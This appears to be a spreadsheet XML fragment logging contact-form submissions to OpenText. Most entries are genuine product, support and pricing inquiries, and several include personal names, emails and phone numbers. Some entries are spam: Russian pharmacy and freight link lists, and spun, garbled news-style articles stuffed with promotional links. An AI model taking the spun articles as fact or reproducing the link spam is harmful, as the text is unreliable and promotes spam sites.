    <t xml:space="preserve">Interest in Faxing server, Pricing, Implantation, &amp; Tech overview. </t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for the install string builder for 16.4 please. I was wondering if you have one for 16.4 and for infocenter as well. </t>
  </si>
  <si>
    <t>We are looking for CCM capabilities and need to go through demo of your CCM products</t>
  </si>
  <si>
    <t>trying to open an account</t>
  </si>
  <si>
    <t>Здравствуйте, меня зовут Артем, я специалист по работе с 1C, стаж работы более 12 лет. Могу выполнить абсолютно любые задачи по Автоматизация 1С: ЕРП, СРМ и др. _x000D_
 _x000D_
Установка и внедрение + могу обучить ваших сотрудников или лично вас работе с 1С _x000D_
 _x000D_
Распространенные обращения ко мне по 1С: _x000D_
_________ _x000D_
------Обновление любых баз данных 1С _x000D_
Как разграничить права менеджерам _x000D_
Как полностью использовать Управление торговлей _x000D_
Как настроить автоматичесое пополнение склада _x000D_
Как установить цены _x000D_
Как добавить новую форму _x000D_
Как научиться работать в 1С _x000D_
как правильно оформить возврат товара от покупателя в 1с 8 2 _x000D_
Как контролировать дебиторскую задолженность _x000D_
_________ _x000D_
Как конролировать склад _x000D_
Как сделать отдельное место кладовщика _x000D_
Как сделать ячеистый склад _x000D_
_________ _x000D_
------ СРМ система в 1С _x000D_
Как сделать воронку продаж? _x000D_
Как не терять клиентов _x000D_
 _x000D_
------+Что умею: _x000D_
1. Доработать все, сто угодно на платформе 8 _x000D_
2. Настройка бизнесс процессов _x000D_
3. Полное знание по "Управление торговлей и СРМ" _x000D_
4. Управление проектами по ЕРП _x000D_
 _x000D_
------+Работал с _x000D_
Норильским Никелем, Норма Кабель, Развитие, ГФК, _x000D_
Эко-Нива, БМВ-Лизинг, ФСЭ, Футжитсу технологии солюшнз _x000D_
 _x000D_
------+Получены Сертификаты: _x000D_
Консультант по Управлению торговлей, _x000D_
Консультант по Зарплате и Управлению персоналом _x000D_
Курсов много пройдено- могу скинуть резюме. _x000D_
 _x000D_
------+Если Вам интересны мои услуги, пишите! _x000D_
------------+Моя почта: promaster1c@gmail.com _x000D_
------------------+ 7 926 477-22-35</t>
  </si>
  <si>
    <t>Inquire about certain capabilities and integrations of CCM product Exstream as part of analysis of various CCM products for a certain client.</t>
  </si>
  <si>
    <t xml:space="preserve">Per Cerner our EMR provider we have to upgrade to AppXtender 8.1. I am a new member on this team looking to be able to download this software. Cerner directed me the My Support and I have registered and have a login but do not have any details since I was told licenses were provided through Cerner. Any help in being able to get information on who UAB's contact is or was would be helpful. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
_x000D_
I have a version of Bravadesktop on my pc that is being replaced can you confirm how I move it to a new PC_x000D_
_x000D_
Many thanks_x000D_
_x000D_
James </t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
We are a vendor of Kohl's Dept. Store. Moving forward they requiring us to us GXS Open Text to setup new UPCs in their system. How do we go about getting setup with this service? _x000D_
_x000D_
Thank you! </t>
  </si>
  <si>
    <t xml:space="preserve">В нашей интернет аптеке вы сможете заказать софосбувир и даклатасвир по низкой стоимости _x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/530/&gt;Sorafenat 120s sorafenib сорафениб купить&lt;/a&gt;_x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/554/&gt;Стивагра (Stivarga) - Регорафениб (Regorafenib) купить&lt;/a&gt;_x000D_
 _x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/566/]Спрайсел (Sprycel) – Дазатиниб купить[/url]_x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/554/]Стивагра (Stivarga) - Регорафениб (Regorafenib) купить[/url]_x000D_
</t>
  </si>
  <si>
    <t>Looking to setup an account to setup a UPC catalog. I also left a voicemail, please call back asap with pricing and instructions on setup. Thank you!</t>
  </si>
  <si>
    <t>Locked out possibly because of lack of use</t>
  </si>
  <si>
    <t>We are in the process of evaluation ECM for our Order Processing function.</t>
  </si>
  <si>
    <t>I see that I can order OpenText HostExplorer and OpenText Secure Shell for a total cost of $373.20. Is that the end of the cost, or would I also have to pay maintenance fees to keep using it year after year?_x000D_
And is this combination your least-expensive terminal emulation method to make an ssh connection between a Windows PC and a Linux server? Or do you have any other products that will meet this simple need?</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to speak to someone regarding your product and cost. Thanks. </t>
  </si>
  <si>
    <t xml:space="preserve">Requesting a demo for the OpenText software. </t>
  </si>
  <si>
    <t>I'd like to talk with someone about your eFaxing solution to understand integration capabilities for both inbound and outbound use cases as well as HIPAA compliance and willingness to sign a BAA.</t>
  </si>
  <si>
    <t>indicação do gerente banco Safra, onde indicou para um processo de tratamento de arquivos bancários.</t>
  </si>
  <si>
    <t>i need to open a catalog ASAP - can you please help with this?_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am trying to access OpenText knowledge center to be able to browse technical documentation. I am part of Accenture which I think is an OpenText partner._x000D_
_x000D_
I am an SAP architect and accessing OpenText documentation will help my day to day job as my client is working with OpenText solution for SAP_x000D_
_x000D_
Is it possible to access this documentation ? If yes, what do I need to do ?_x000D_
_x000D_
Kind regards_x000D_
Guillaume</t>
  </si>
  <si>
    <t xml:space="preserve">I have a renewal where we have purchased with a 3rd party partner in the past, but I would like to purchase directly from OpenTex if possible._x000D_
This is our renewal information_x000D_
O TRF-SSUP-RN OpenText Standard ASP Support for RightFax Production Server, 1-Year during business hours (8am-8pm  EST). Provides support via phone, remote access and the OpenText Knowledge Center. Also includes full and point upgrade media on versions released during the active term of the contract. All upgrade media is upon request and downloadable from the downloads section of the RightFax Knowledge Center._x000D_
SUID:  19022-12172 Expires:  07/31/2018 Renewal Period:  08/01/2018 - 07/31/2019_x000D_
_x000D_
O TRF-SSUP-RN OpenText Standard ASP Support for RightFax Production Server, 1-Year during business hours (8am-8pm  EST). Provides support via phone, remote access and the OpenText Knowledge Center. Also includes full and point upgrade media on versions released during the active term of the contract. All upgrade media is upon request and downloadable from the downloads section of the RightFax Knowledge Center._x000D_
SUID:  30676-12107 Expires:  07/31/2018 Renewal Period:  08/01/2018 - 07/31/2019_x000D_
</t>
  </si>
  <si>
    <t>Hi!_x000D_
I need access to My Support. We (Altran) are partners, earlier with EMC and now with OpenText. I specifically need access to the documentation for Documentum products!_x000D_
Best regards!_x000D_
/Jonas Flodin</t>
  </si>
  <si>
    <t>Hello i want trial version of Content server 16.2 for testing your product.</t>
  </si>
  <si>
    <t>Opening for software testing engineer jobs</t>
  </si>
  <si>
    <t>The prostate related is the central section of a male's reproductive system. It secretes fluids that assist the transportation and activation of sperm. The prostate related can be found just while watching rectum, below the bladder and surrounding the urethra. When there is prostate problem, it is usually really really irritating and inconvenient for the patient as his urinary method is directly affected. _x000D_
 _x000D_
The common prostate health conditions are prostate infection, enlarged prostate and cancer of the prostate. _x000D_
 _x000D_
 _x000D_
 _x000D_
Prostate infection, also known as prostatitis, is regarded as the common prostate-related problem in men younger than 55 years old. Infections in the prostate gland are classified into four types - acute bacterial prostatitis, chronic bacterial prostatitis, chronic abacterial prostatitis and prosttodynia. _x000D_
 _x000D_
Acute bacterial prostatitis may be the least common of types of prostate infection. It is a result of bacteria located in the large intestines or urinary tract. Patients may go through fever, chills, body aches, back pains and urination problems. This condition is treated through the use of antibiotics or non-steroid anti-inflammatory drugs (NSAIDs) to ease the swelling. _x000D_
 _x000D_
Chronic bacterial prostatitis is often a condition connected with a particular defect within the gland and the persistence presence of bacteria inside the urinary tract. It can be caused by trauma on the urinary tract or by infections from other regions from the body. A patient may experience testicular pain, small of the back pains and urination problems. Although it is uncommon, it is usually treated by removal with the prostate defect then the utilization antibiotics and NSAIDs to deal with the inflammation. _x000D_
 _x000D_
Non-bacterial prostatitis makes up about approximately 90% coming from all prostatitis cases; however, researchers have not yet to create the cause of these conditions. Some researchers feel that chronic non-bacterial prostatitis occur as a result of unk</t>
  </si>
  <si>
    <t>I am working on a contract with the requirement to setup OpenText archiving along side SAP Hana, I have not used OpenText enough to be able to do this on my own, and would like to get some more indepth knowledge documents about the setup of OpenText ECM, and best practice documents for SAP Archiving using OpenText, as it looks like it has changed since last time I set this up._x000D_
_x000D_
Can you assist in pointing me in the best resource please._x000D_
_x000D_
Thank you for anything you can help with._x000D_
_x000D_
Paul.</t>
  </si>
  <si>
    <t xml:space="preserve">would like a quote for this product </t>
  </si>
  <si>
    <t xml:space="preserve">We are using Captaris Alchemy Release 8.3 (Build 500.204), we are having issue when viewing PDFs. What version of adobe is required for this version of Alchemy?._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi team,_x000D_
_x000D_
We are trying to work with Nordstrom in the US, and they are asking us to submit our catalog to their GSX platform, and their guideline suggested us either to go with your service or another vendor. Could you please let us know how we can proceed?_x000D_
_x000D_
(We already have a separate EDI vendor set up with Nordstrom, looks like we only need the Catalog function from your side.)_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Urgently looking for DMS demo</t>
  </si>
  <si>
    <t>I would like to ask if 5-4955 OpenText Process Platform v16 Developer Certification Exam has prerequisite and if it's mandatory to take your classes before writing the exam(s).</t>
  </si>
  <si>
    <t>Getting an error 91 in NIC using Qfininti software.</t>
  </si>
  <si>
    <t>Looking for sales professional to help educate our staff to the abilities and benefits of ECM and provide a solution and budgetary quote for next fiscal year (presentation for 2019 budget: August 9th)</t>
  </si>
  <si>
    <t>Interest in Web Content and Experience Manager, we have 4 different companies in Brazil and would like to know how those products can add value to our customers.</t>
  </si>
  <si>
    <t xml:space="preserve">test test test sent 7/11/2018  1:42pm Pacific time </t>
  </si>
  <si>
    <t>Request a list of versions/releases since 5.3.1 with summary of features of each version/release.</t>
  </si>
  <si>
    <t>I would like to send a request for quote - please provide a contact email address.  Thank you!</t>
  </si>
  <si>
    <t>looking to discus Digital Asset Management Capabilities</t>
  </si>
  <si>
    <t>Good afternoon, I work in a Regulatory environment and have been tasked with looking into the Documentum system as a possible ECM solution. Could someone please assist me in understanding the functionality of Documentum and if this would be an appropriate fit for my organization?</t>
  </si>
  <si>
    <t>Interested in Data extraction from PDF documents into more "structured" format using your new Rest Services</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently using Legalkey 4.0, and wanted to know how we can get a service/maintenance agreement directly from Open Text. We currently use a third party vendor, Exela, but we are terminating our contract with them on July 31, 2018. </t>
  </si>
  <si>
    <t xml:space="preserve">I was employed by Daegis from 2010 through 2012. I just want to know where can I reach Human Resources to get info about my 401K contribution. Please help, thanks._x000D_
</t>
  </si>
  <si>
    <t>I have a customer looking for a fax software that allows them to send faxes electronically from their desktop/computer._x000D_
_x000D_
Thank You_x000D_
Flor Zubiate_x000D_
9152196750</t>
  </si>
  <si>
    <t>Hi Opentext Security Team,_x000D_
I'm Pethuraj and I found a vulnerability in your site. The SPF (Sender Policy Framework) is missing and so an attacker can spoof your emails and can do malicious act._x000D_
_x000D_
Visit kitterman[dot]com and Check your domain._x000D_
You will not find any valid SPF records and it leads to spoofing of emails._x000D_
_x000D_
_x000D_
It simply means an attacker can use site like emkei[dot]cz to send spoofed emails and can perform malicious act._x000D_
_x000D_
An attacker can use you emails like support@opentext.com, jobs@opentext.com, etc and can send emails to the victim._x000D_
Since I tried providing URL's here in this form and I'm unable to do it. In case if this report is unclear, do contact me via my email for more information._x000D_
Thanks and Regards,_x000D_
Pethuraj M</t>
  </si>
  <si>
    <t>We are shopping for an on-site software fax solution that will work with our on-site PBX server.</t>
  </si>
  <si>
    <t>Hi, _x000D_
Can you please provide BIRT license and pricing model ?</t>
  </si>
  <si>
    <t>We currently support a law firm as their general IT MSP. They have a few mac-/apple-only users, but not everyone. They need a DMS and have a specific requirement that any application must be mac-compatible AND it needs to be able to either search or preferable manage records/retention on MacOS and iOS. I'd like to discuss your approach to this scenario.</t>
  </si>
  <si>
    <t>юя</t>
  </si>
  <si>
    <t xml:space="preserve">Our customer would like us to provide pricing for a Fax2Mail renewal. _x000D_
Please email me at Kevin_Noriega@shi.com and we can discuss this opportunity. </t>
  </si>
  <si>
    <t>Nous souhaiterions mettre en place une solution de moteur de recherche avancée pour permettre à nos utilisateurs de retrouver plus facilement l'information pertinente nécessaire à leur activité. J'aurai besoin d'un contact commercial ASAP. Pourriez-vous revenir vers moi SVP?</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
My Name is Dushyant Chaudhary, I work for UnitedHealth Group. We have RightFax server setup internally, I am developing a Windows Form based application using VB dot NET language. I am using RFCOMAPILib for doing some operations in my application. I tried to find code samples on your website but could not locate any. I only found a code sample to connect to RightFax server and list faxes for me as user in listbox._x000D_
I am able to list all users available on Server, List all the folder in my ID, List all faxes assigned/routed to me and move faxes from one folder to another. _x000D_
But when I am trying to list/view faxes for another user or route my faxes to another user using RouteToUser or ForwardToUsers methods, I always get Access Denied error. I am able to do these operations using the Client application FaxUtil. I want to do these operations using my VB dot NET/C# code._x000D_
_x000D_
I am not able to find any resource or documentation on COM API on internet or your website. I need your help getting some code samples so that I can develop an application for my company._x000D_
_x000D_
Thanks &amp; Regards</t>
  </si>
  <si>
    <t>We are using Brava! Enterprise and have run into some technical errors that we are unable to troubleshoot ourselves.  We are attempting to contact support to help, but not sure how to do that.  I believe we have an open account, but not sure what our support level is._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Bo Huffman</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern,_x000D_
_x000D_
we are currently running OpenText Archive for one our Customer on Net App Hardware. We want to change the HW to IBM V5000. Is this supported with OpenText?_x000D_
_x000D_
Thank you in advance!_x000D_
_x000D_
Kind regards,_x000D_
Alexander Rainer-Harbach_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There._x000D_
Our company is looking to purchase a software application to manage our QHSE compliance systems. Please provide contact details so that I can issue a preliminary 'request for information' in advance of a potential invitation to tender._x000D_
Kind regards_x000D_
Toby_x000D_
</t>
  </si>
  <si>
    <t>[english text see below]_x000D_
Zürich, 11. Juli 2018_x000D_
Sehr geehrte Damen und Herren_x000D_
Die SNB (Schweizerische Nationalbank) überprüft periodisch ihre extern lizensierten Software Produkte. _x000D_
Wir haben Sie als möglichen Anbieter einer neuen AML (Anti-Money-Laundering) Sanction-Filter Lösung gefunden und möchten Sie deshalb anfragen, inwiefern Sie unsere initialen technischen Anforderungen grundlegend erfüllen. _x000D_
Dazu möchten wir Ihnen folgende Fragen stellen:_x000D_
1.	Wie sieht ihre grundsätzliche Lösungsarchitektur aus? Bieten Sie eine Serverbasierte Lösung (inhouse beim Kunden) oder eine ausschliessliche Cloud-Lösung an? _x000D_
2.	Auf welchen Betriebssystemen ist Ihre Anwendung lauffähig? Unterstützen Sie Linux RedHat 6 oder höher mit ESX Technologie uneingeschränkt?_x000D_
3.	Welche Datenbanksysteme unterstützen Sie? In welchen Versionen?_x000D_
4.	Ist Ihr User Interface (UI) Web basierend? Auf welchen Browsern und in welchen Versionen ist es uneingeschränkt und problemlos lauffähig?_x000D_
5.	Wie sieht Ihre allgemeine Systemintegration aus? Ist IBM-MQ als Message Provider in Ihrer Lösung ein fest integrierter Bestandteil? Ist Ihre Applikation mittels Control_M (Operation Monitor System) steuerbar (start/stop etc.)?_x000D_
6.	Wie sieht Ihr Release Plan und Ihr entsprechendes Release Verfahren aus?_x000D_
7.	Wie ist die Wartung der Anwendung sichergestellt? Wie sieht Ihre Supportorganisation aus?_x000D_
8.	Wie sieht Ihre strategische Ausrichtung und Planung betreffend Ihrer Software Lösung in den nächsten drei bis fünf Jahren aus? Wird Ihre Software den technischen und gesetzlichen Anforderungen laufend angepasst und/oder erweitert? Bestehen Pläne für Übernahmen/Fusionen mit anderen Anbietern?_x000D_
9.	Wie lautet Ihre genaue und offizielle Anschrift (Postadresse) für eine formale Offert Anfrage?_x000D_
10.	Nennen Sie uns bitte je einen administrativen und technischen Ansprechpartner auf Ihrer Seite mit Namen, Vornamen und Funktion/Stellung sowie email für unsere möglichen weiteren Fragen._x000D_
Wir danken Ihnen für eine präzise und</t>
  </si>
  <si>
    <t>Hi, I am sending this message to request an account for myself which I will use in learning and training. Kindly treat this as urgent.</t>
  </si>
  <si>
    <t>I have been advised by my manager to take one of the courses through "OpenText Training" and that the Training is free for OpenText employees. The course in question is found on the OpenText training website with the id of 2322 (and not through Learning Central) on July 30th. How do I enroll for this for free?_x000D_
_x000D_
Thanks,_x000D_
Holly</t>
  </si>
  <si>
    <t>nach Installation unter Win10 und Start von Exceed 14 -&gt; Fatal error: Standardschriftart kann nicht geöffnet werden. Bitte dringend um eine Lösung!_x000D_
upgrade Price from Exceed 14  to Exceed 15</t>
  </si>
  <si>
    <t>I have a customer interested in your product. Please can you provide a cost for perpetual license for 2 users for Exceed Turbo X product to access a Red Hat Linux server. Please could you also include 1 yr support costs in quote and email over to me.</t>
  </si>
  <si>
    <t>Looking for a sales demo and conference call.</t>
  </si>
  <si>
    <t>prior to hosting created as to derogatory views_x000D_
_x000D_
Maura Healey is marked this person [url=http://www.abnewswire.com/pressreleases/asiame-review-on-customized-christmas-celebration-within-mainland-china_173085.html]AsiaME.COM[/url] supports the escalating number of cellular networks running WEEI knowning that absolutely no mention profit may be passed to advertising on sports a radio station [url=https://www.youtube.com/watch?v=fA0zCCicIRI]Asiame.com[/url] network a direct consequence of current controversies, in the event that they create "a couple fluctuates,_x000D_
_x000D_
"I realize its noteworthy that you choose to see a good number of advertisers pulling out and after that making the decision in their accessories in the present day, recognizing that there's a real bounce against necessitate this important out of the discourse, the ma legitimate main told me in a conversation thursday on WGBH's boston ma community stereo._x000D_
_x000D_
WEEI terminated intended for audra Fauria due to five days a while back, once the radio host and past gambling tight wind widely used a stereotypical hard anodized cookware accessory to model he Brady's specialist, put on Yee. Fauria's suspensions were as few as two weeks can be section indefinitely revoked another hostfor making a disparaging review all-around Brady's 5 yr old son._x000D_
_x000D_
"this isn't the very first time that EEI has found [url=http://www.dailymotion.com/video/x6kl0gs]aSIAME.com[/url] their families in the course of critique through things oftentimes a radio station hosts end up with identified, Healey exclaimed saturday, Alluding to the radio station's for some time the past at controversiesand the bodies feedback. "regarding starts back years,_x000D_
_x000D_
Healey, a former basketball game player their self, said it was deflating to to determine contact "Devolve" so greatly, ends up too crowded "a great deal of to share" thinking about showcases._x000D_
_x000D_
"do not need be making evaluations all through that that is normally racial or maybe derogatassociat</t>
  </si>
  <si>
    <t>Hi, I have the below requirement for Transport for London, please could someone get in contact with me urgently?_x000D_
Brava Publishing Visual Rights	Brava Publishing Visual Rights by IGC</t>
  </si>
  <si>
    <t>Hi,_x000D_
We’re looking to develop an industry-leading master agreement capability, which includes process, people and data improvements as well as investigating technology solutions. _x000D_
We’re considering to reach out to you to provide further information around the technology solution(s) you have to offer. Who would be the appropriate point of contact for RFI?_x000D_
Regards,_x000D_
Lilian</t>
  </si>
  <si>
    <t>I cannot get into any of the OT apps such as success factors , salesforce etc. It comes up with a message incorrect credentials?</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I tried reaching out but never got a reply._x000D_
_x000D_
could you please contact me so we can set up a call to discuss the possibility of working together?_x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t>keep Sciences has a_x000D_
_x000D_
that when illustrator Cristiana Couceiro researched by simply supply images as to therefore, the images of men peered "valid and as a result real, while depictions of women acquired been [url=https://www.youtube.com/watch?v=fA0zCCicIRI]asiaMe[/url] "a little wild and additionally lovely, a passes a attitude shows reproductive being a nuisance, Couceiro reasoned. so very your mom intended them illustration for upgrade "a feeling of dealing with back again again, although rrt is adjacent to scourges and simply constraints showed by symbols with all the sciences, most of the female butt end "is actually fed up with the silence, Couceiro alleges. "it's usually to finish shouting all things that were put tranquil about such a long time,_x000D_
_x000D_
i've got seen some sort of metoo advertising and marketing campaign as avidly anyone. may done cargo box each night trying to figure out that will be outed such as a between the sheets harasser early in the day, Whether is going to be someone else of our political heroes or individuals every person consider received from general population content movie. it's hard to miss individualized perpetrators forfeit perform, be required to decide, but also [url=http://www.dailymotion.com/video/x6kl0gs]AsiaMe[/url] cope with economic hassle for their abhorrent conducts._x000D_
_x000D_
even so i haven't been paid to cot a single evening in these types of months curious solutions researcher may just be sacked each and every being a his or transgressions child be freely outed because practically harassers squander their whole employment._x000D_
_x000D_
in this particular biological materials both remedy nuisance and so attacks obtained through more women as compared reflecting men the truth their society in most importantly._x000D_
_x000D_
ladies opinions together with sexual misconduct via clinical fieldwork were and not simply quantitatively much larger additionally it is qualitatively much worse compared to men's. woman people came often focused from perpetr</t>
  </si>
  <si>
    <t xml:space="preserve">We are implementing ECM for one of our clients and looking for options, need your help to understand OpenText with below parameters:_x000D_
_x000D_
Category_x000D_
USP_x000D_
Tag_x000D_
Multi-user system_x000D_
Extension/Plug-in_x000D_
License_x000D_
Operating system_x000D_
Programming language_x000D_
Database_x000D_
Trackback_x000D_
WYSIWYG-Editor_x000D_
Multiple projects_x000D_
External pages_x000D_
Template language_x000D_
Target audience_x000D_
Framework_x000D_
Design pattern_x000D_
Development principles_x000D_
Object-Relational Mapping (ORM)_x000D_
Comments_x000D_
Scripting language support_x000D_
Backend_x000D_
Browser support_x000D_
JVM_x000D_
Open Source_x000D_
XQuery Support_x000D_
Database model_x000D_
Scaffolding_x000D_
E-Mail protocols_x000D_
Supported VCS_x000D_
Websocket Support_x000D_
Outlook Integration </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
i would know if it's possible buy a copy of the VIM Manual ( Vendor Invoice Management for SAP Solutions v7.5 SP1)._x000D_
_x000D_
Thanks in advance_x000D_
_x000D_
Giacomo Ambrosin </t>
  </si>
  <si>
    <t xml:space="preserve">Becouse I seen y’all sight on a tv camercial and I wanted to know do y’all really move people in houses </t>
  </si>
  <si>
    <t>We are doing a feasibility analysis to create an OpenText Content Server adapter for one of the products in out product suite. Kindly let me know how I can get an evaluation copy of OpenText Content Server.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je souhaiterais échanger avec un responsable commercial. Biomerieux souhaite procéder à un choix de solution de GED. Je souhaiterais préciser quelques points avant d'organiser une rencontre avec les décisionnaires du projet._x000D_
Merci de me contacter par email afin de planifier une conférence téléphonique._x000D_
Merci,_x000D_
Cordialement._x000D_
Clémentine Kauffmann</t>
  </si>
  <si>
    <t>Hello, Please provide at least 3 suppliers or partners you have for Singapore. We need to invite them for our Bidding process. Thank you!</t>
  </si>
  <si>
    <t>I am trying to download a trial of Exceed and Exceed 3d, but I am receiving an error that doesn't appear to be related to the content of the form.  Please could you send links for Exceed and Exceed 3d_x000D_
_x000D_
Thank you_x000D_
David</t>
  </si>
  <si>
    <t>Hi, I am completing software asset inventory list, VicRoads has purchased Open Text Licenses through one of your Australian re-sellers, however they are unable to provide SKU# for the products we purchased. Can someone please assist?_x000D_
Regards_x000D_
Lei</t>
  </si>
  <si>
    <t>Questions on portal enhancement etc.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;a href="http://speedyboard.be/index.php/choosing-an-essay-topics-great-tips"&gt;How to recognize your paper topic&lt;/a&gt; _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have a government customer looking to renew the item below and was told that OpenText owns it. Am I able to source pricing from you? EMC ENH MAINT for Trusted Content Services CORE (Qty=2) _x000D_
Part Number: TRSTD-CNTS-MC _x000D_
</t>
  </si>
  <si>
    <t>Harvey WeinsteinFired based in his own producing companionship_x000D_
_x000D_
"see how to avoid of recent regarding misconduct made by Harvey Weinstein who has blossomed in recent days, The administrators within the Weinstein service provider Robert Weinsten, puncture Maerov, richard Koenigsberg but Taka tom Ammar will have driven, and have now aware Harvey Weinstein, that particular his / her an opportunity aided by the Weinstein insurer is baulked, robust straight, visits a statement from their plank siding coming from all directors, have caused by variation._x000D_
_x000D_
Wein thesteco based the film facility along with his pal 2005, is now an usage stake inside. it contains produced a part of Hollywood's most popular results, especially "Django Unchained" and "typically King's conversational,_x000D_
_x000D_
former now, Weinstein had reportedly lawyering down to eliminate two "potentially explosive" myths surrounding your own. The san francisco schedules circulated a specific content on sunday._x000D_
_x000D_
called"decades using lustful nuisance [url=http://www.abnewswire.com/pressreleases/asiamecom-sums-up-the-signs-telling-youre-having-a-crush_137164.html]AsiaME.COM[/url] claims as opposed to Harvey Weinstein, any watch insight frightening allegations originally from Weinstein's existing as well as first workers' relatives, in addition to being occasional actress Ashley Judd._x000D_
_x000D_
Judd revealed each expertise who has Weinstein exactly where which he "transmitted thes really the size of his [or resort] bathroom, where exactly he was published in the shower robe and as well,as well as the inquired and if he could leave her with a stroke because,since lousy pay attention to the guy showering,_x000D_
_x000D_
the changing times study containsa connected with a few claims, such as declare that Weinstein supposedly unplaned a mode involving peace and quiet regarding his doings as found an undisclosed resolution to presenter accepted McGowan. (McGowan don't provide feedback in this content, although mother seeminglyresponded wi</t>
  </si>
  <si>
    <t>I am desperately seeking help with PDF Blaster.  I know that Bill Fallon worked with Data Fabrication in 2006.  If there is any contact information for pdf blaster or Data Fabrication or Christopher Fallvey, I would appreciate it.  My client is very anxious.</t>
  </si>
  <si>
    <t xml:space="preserve">Новое лечение гепатита С в России, препараты для лечения гепатита С вы можете закзать у нас, консультация врача бесплатно _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=https://onkoforum.com/viewtopic.php?f=81&amp;t=679&amp;p=1606#p1606]зелбораф купить[/url]_x000D_
[url=https://onkoforum.com/viewtopic.php?f=81&amp;t=679&amp;p=1606#p1606]купить золадекс в москве[/url]_x000D_
[url=https://onkoforum.com/viewtopic.php?f=81&amp;t=679&amp;p=1606#p1606]дженерик ибрутиниб[/url]_x000D_
[url=https://onkoforum.com/viewtopic.php?f=81&amp;t=679&amp;p=1606#p1606]купить зелбораф в москве[/url]_x000D_
[url=https://onkoforum.com/viewtopic.php?f=81&amp;t=679&amp;p=1606#p1606]тарцева купить[/url]_x000D_
 _x000D_
 _x000D_
&lt;a href=https://onkoforum.com/viewtopic.php?f=81&amp;t=679&amp;p=1606#p1606&gt;caprelsa капрелса вандетаниб vandetanib&lt;/a&gt;_x000D_
&lt;a href=https://onkoforum.com/viewtopic.php?f=81&amp;t=679&amp;p=1606#p1606&gt;тасигна nilotinib tasigna&lt;/a&gt;_x000D_
&lt;a href=https://onkoforum.com/viewtopic.php?f=81&amp;t=679&amp;p=1606#p1606&gt;стиварга купить в москве&lt;/a&gt;_x000D_
&lt;a href=https://onkoforum.com/viewtopic.php?f=81&amp;t=679&amp;p=1606#p1606&gt;гефитиниб отзывы&lt;/a&gt;_x000D_
&lt;a href=https://onkoforum.com/viewtopic.php?f=81&amp;t=679&amp;p=1606#p1606&gt;jakavi джакави ruxolitinib руксолитиниб&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t>Boa tarde! _x000D_
O motivo do meu contato é que estamos escolhendo uma Solução de ECM para VLI e gostariamos de conhecer a solução da OpenText._x000D_
_x000D_
Aguardo.</t>
  </si>
  <si>
    <t>Interested in replacing old RightFax telephony and remote fax board servers with RightFax Connect. Would like to get a quote to forward to management.</t>
  </si>
  <si>
    <t>I have a client who currently runs the ApplicationXtender product that you have purchased. I would like to find out if there is a roadmap that relates to the future of this product. Will you be phasing it out in preference for the OpenText flagship ECM product or continuing to support and continuing to develop this application?</t>
  </si>
  <si>
    <t>Would like to price Document Storage Solution for 50 users, 10,000 documents with very little growth after that.</t>
  </si>
  <si>
    <t>I would like some information (licensing, pricing, as well as technical) on the Opentext eDocs integrations with SharePoint and Office 365.</t>
  </si>
  <si>
    <t>I would like to know if you can Scan documents directly into DM  and if so what is required as of special drivers or scanners.</t>
  </si>
  <si>
    <t>Hi OpenText, we are currently using Captaris Workflow to manage our transfer-in process. In addition, we also use OpenText eDocs DM. Since Captaris Workflow has been rebranded, what product do you recommend as a replacement? Could you send us information about the recommended product?</t>
  </si>
  <si>
    <t>Upgrading our Rightfax to 16.2</t>
  </si>
  <si>
    <t>Demo or presentation of speech analytics solution.</t>
  </si>
  <si>
    <t>I am transferring to Open Text from Hightail. There are so many services on your website I cannot figure out which replaces Hightail for file sharing. Feeling overwhelmed.</t>
  </si>
  <si>
    <t>I want to know Documentum Support Matrix for Operating Systems supported, and Apllication Servers, an Databases.</t>
  </si>
  <si>
    <t xml:space="preserve">недорогие грузоперевозки Новосибирск_x000D_
грузоперевозки Тюмень отзывы_x000D_
международные грузоперевозки_x000D_
грузоперевозки Красноярск_x000D_
недорогие грузоперевозки Новосибирск отзывы_x000D_
недорогие международные грузоперевозки Омск отзывы_x000D_
международные грузоперевозки РФ РБ_x000D_
недорогие международные грузоперевозки отзывы_x000D_
недорогие грузоперевозки Россия Беларусь отзывы_x000D_
международные грузоперевозки РФ РБ отзывы_x000D_
 _x000D_
[URL="https://mityr-trans.com/stati/zachem-nuzhen-avtorefrizherator.html"]недорогие грузоперевозки Томск отзывы[/URL] _x000D_
недорогие грузоперевозки Омск отзывы_x000D_
международные грузоперевозки Пермь_x000D_
грузоперевозки Тюмень отзывы_x000D_
международные грузоперевозки Екатеринбург_x000D_
недорогие международные грузоперевозки Омск_x000D_
недорогие грузоперевозки Пермь_x000D_
международные грузоперевозки Красноярск отзывы_x000D_
недорогие грузоперевозки Россия Беларусь_x000D_
недорогие международные грузоперевозки Красноярск отзывы_x000D_
недорогие грузоперевозки РФ РБ отзывы_x000D_
</t>
  </si>
  <si>
    <t>Hello!_x000D_
_x000D_
 _x000D_
_x000D_
Our team at ClickNerd is currently looking for high quality traffic from trusted sources like yourself. We’re currently looking to integrate our XML Feed on your network to start a long-term and prosperous traffic partnership._x000D_
_x000D_
 _x000D_
_x000D_
We are looking for you to passback url or subid so we can optimize our campaigns across your traffic and continue to scale as we continue our partnership._x000D_
_x000D_
 _x000D_
_x000D_
